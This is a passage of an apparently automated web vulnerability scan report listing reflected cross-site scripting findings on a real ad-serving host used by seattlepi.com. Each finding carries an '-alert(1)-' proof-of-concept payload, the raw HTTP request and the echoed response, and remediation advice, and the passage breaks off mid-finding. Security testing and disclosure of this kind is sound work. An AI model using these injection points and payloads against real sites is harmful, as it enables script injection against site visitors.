P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:49:28 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:49:28 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home;sz=728x90;net=q1;ord=3639010052?&f507c'-alert(1)-'0cce3655674=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.12. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/home

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d6c0'-alert(1)-'5ac724d3334 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer/home;sz=728x90;ord=3639010052?2d6c0'-alert(1)-'5ac724d3334 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 468
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:49:26 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E90af58da731901b84ed373b8; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:49:26 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home;sz=728x90;net=q1;ord=3639010052?2d6c0'-alert(1)-'5ac724d3334;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.13. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42243'-alert(1)-'0157ffe4a1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer42243'-alert(1)-'0157ffe4a1a/qo;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 467
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:23:43 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:23:43 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer42243'-alert(1)-'0157ffe4a1a/qo;sz=300x250;net=q1;ord=[timestamp];'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.14. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4364f'-alert(1)-'1be745942f1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer/qo4364f'-alert(1)-'1be745942f1;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 467
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:23:44 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:23:44 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo4364f'-alert(1)-'1be745942f1;sz=300x250;net=q1;ord=[timestamp];'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.15. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/qo

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f44b9'-alert(1)-'d4036993b4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer/qo;sz=300x250;ord=[timestamp]?&f44b9'-alert(1)-'d4036993b4b=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:23:41 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:23:41 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo;sz=300x250;net=q1;ord=[timestamp]?&f44b9'-alert(1)-'d4036993b4b=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.16. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7365'-alert(1)-'5ffed8dc568 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer/qo;sz=300x250;ord=[timestamp]?c7365'-alert(1)-'5ffed8dc568 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 468
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:23:40 GMT
Connection: close
Set-Cookie: dc=sea-dc90af58da95785a528f279adf; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:23:40 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo;sz=300x250;net=q1;ord=[timestamp]?c7365'-alert(1)-'5ffed8dc568;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.17. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.454.61DCBAA1/_default

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aac19'-alert(1)-'6ed63ccc02d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjaac19'-alert(1)-'6ed63ccc02d/bzo.454.61DCBAA1/_default;sz=728x90;net=bzo;ord=1316294704606;ord1=364732;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7362
Date: Sat, 17 Sep 2011 16:25:34 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-30322335468_1316276734","http://ad.doubleclick.net/adjaac19'-alert(1)-'6ed63ccc02d/bzo.454.61DCBAA1/_default;net=bzo;u=,bzo-30322335468_1316276734,1229bf517f8af24,sports,;;cmw=owl;sz=728x90;net=bzo;ord1=364732;contx=sports;dc=s;btg=;ord=1316294704606?","728","90",true);</scr'+'ipt>
...[SNIP]...
4.18. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.454.61DCBAA1/_default

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d936d'-alert(1)-'4c985a1bafd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.454.61DCBAA1d936d'-alert(1)-'4c985a1bafd/_default;sz=728x90;net=bzo;ord=1316294704606;ord1=364732;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 16:25:35 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-30415204234_1316276735","http://ad.doubleclick.net/adj/bzo.454.61DCBAA1d936d'-alert(1)-'4c985a1bafd/_default;net=bzo;u=,bzo-30415204234_1316276735,1229bf517f8af24,sports,;;sz=728x90;net=bzo;ord1=364732;contx=sports;dc=s;btg=;ord=1316294704606?","728","90",true);</scr'+'ipt>
...[SNIP]...
4.19. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.454.61DCBAA1/_default

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b12e'-alert(1)-'945e5cb6e32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.454.61DCBAA1/_default9b12e'-alert(1)-'945e5cb6e32;sz=728x90;net=bzo;ord=1316294704606;ord1=364732;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 16:25:35 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-30308893230_1316276735","http://ad.doubleclick.net/adj/bzo.454.61DCBAA1/_default9b12e'-alert(1)-'945e5cb6e32;net=bzo;u=,bzo-30308893230_1316276735,1229bf517f8af24,sports,;;sz=728x90;net=bzo;ord1=364732;contx=sports;dc=s;btg=;ord=1316294704606?","728","90",true);</scr'+'ipt>
...[SNIP]...
4.20. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.454.61DCBAA1/_default

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bc96'-alert(1)-'b8781adc851 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.454.61DCBAA1/_default;sz=1bc96'-alert(1)-'b8781adc851 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7329
Date: Sat, 17 Sep 2011 16:25:27 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
age="Javascript">CollectiveMedia.createAndAttachAd("bzo-30101590727_1316276727","http://ad.doubleclick.net/adj/bzo.454.61DCBAA1/_default;net=bzo;u=,bzo-30101590727_1316276727,1229bf517f8af24,none,;;sz=1bc96'-alert(1)-'b8781adc851;contx=none;dc=s;btg=?","1bc96'-alert(1)-'b8781adc851","",true);</scr'+'ipt>
...[SNIP]...
4.21. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/be_home

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c87f'-alert(1)-'f1f13cb8f9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj6c87f'-alert(1)-'f1f13cb8f9d/q1.q.seattlepostintelligencer/be_home;sz=300x250;net=q1;ord=3896159382;ord1=943060;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7367
Date: Sat, 17 Sep 2011 16:48:08 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='121773f9380f32f';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30318841590_1316278088","http://ad.doubleclick.net/adj6c87f'-alert(1)-'f1f13cb8f9d/q1.q.seattlepostintelligencer/be_home;net=q1;u=,q1-30318841590_1316278088,121773f9380f32f,polit,;;cmw=owl;sz=300x250;net=q1;ord1=943060;contx=polit;dc=s;btg=;ord=3896159382?","300","250",true);</scr'+
...[SNIP]...
4.22. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/be_home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d81ef'-alert(1)-'b5262d5dc96 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.seattlepostintelligencerd81ef'-alert(1)-'b5262d5dc96/be_home;sz=300x250;net=q1;ord=3896159382;ord1=943060;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7367
Date: Sat, 17 Sep 2011 16:48:09 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='121773f9380f32f';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30309610626_1316278089","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencerd81ef'-alert(1)-'b5262d5dc96/be_home;net=q1;u=,q1-30309610626_1316278089,121773f9380f32f,polit,;;cmw=owl;sz=300x250;net=q1;ord1=943060;contx=polit;dc=s;btg=;ord=3896159382?","300","250",true);</scr'+'ipt>
...[SNIP]...
4.23. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/be_home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8316e'-alert(1)-'256db4774f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.seattlepostintelligencer/be_home8316e'-alert(1)-'256db4774f0;sz=300x250;net=q1;ord=3896159382;ord1=943060;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7367
Date: Sat, 17 Sep 2011 16:48:10 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='121773f9380f32f';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30517347600_1316278090","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/be_home8316e'-alert(1)-'256db4774f0;net=q1;u=,q1-30517347600_1316278090,121773f9380f32f,polit,;;cmw=owl;sz=300x250;net=q1;ord1=943060;contx=polit;dc=s;btg=;ord=3896159382?","300","250",true);</scr'+'ipt>
...[SNIP]...
4.24. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/be_home

